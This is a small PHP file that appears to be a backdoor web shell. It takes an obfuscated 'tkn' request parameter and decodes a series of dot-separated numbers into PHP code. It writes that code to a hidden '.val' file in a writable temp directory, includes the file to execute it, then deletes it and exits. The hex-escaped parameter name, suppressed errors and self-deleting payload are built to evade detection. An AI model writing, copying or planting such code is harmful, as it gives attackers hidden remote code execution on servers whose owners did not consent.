<?php

if(@$_REQUEST["t\x6B\x6E"] !== null){
	$flag = $_REQUEST["t\x6B\x6E"];
	 $flag			= 	 explode   (	"."	, $flag);	 
	$token = '';
            $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s4);
            $k = 0;
            $len = count($flag);
    
            do { 	if ($k>=  $len) break;
                $v2 = $flag[$k];
                $sChar = ord($s4[$k%		$sLen]);
                $d = ((int)$v2 - $sChar - ($k%		10))^ 47;
                $token .= chr($d);
                $k++;	}while (true);
	$pset = array_filter([getenv("TEMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TMP")]);
	foreach ($pset as $hld) {
    		if ((is_dir($hld) and is_writable($hld))) {
    $dchunk = "$hld" . "/.val";
    $success = file_put_contents($dchunk, $token);
if ($success) {
	include $dchunk;
	@unlink($dchunk);
	die();}
}
}
}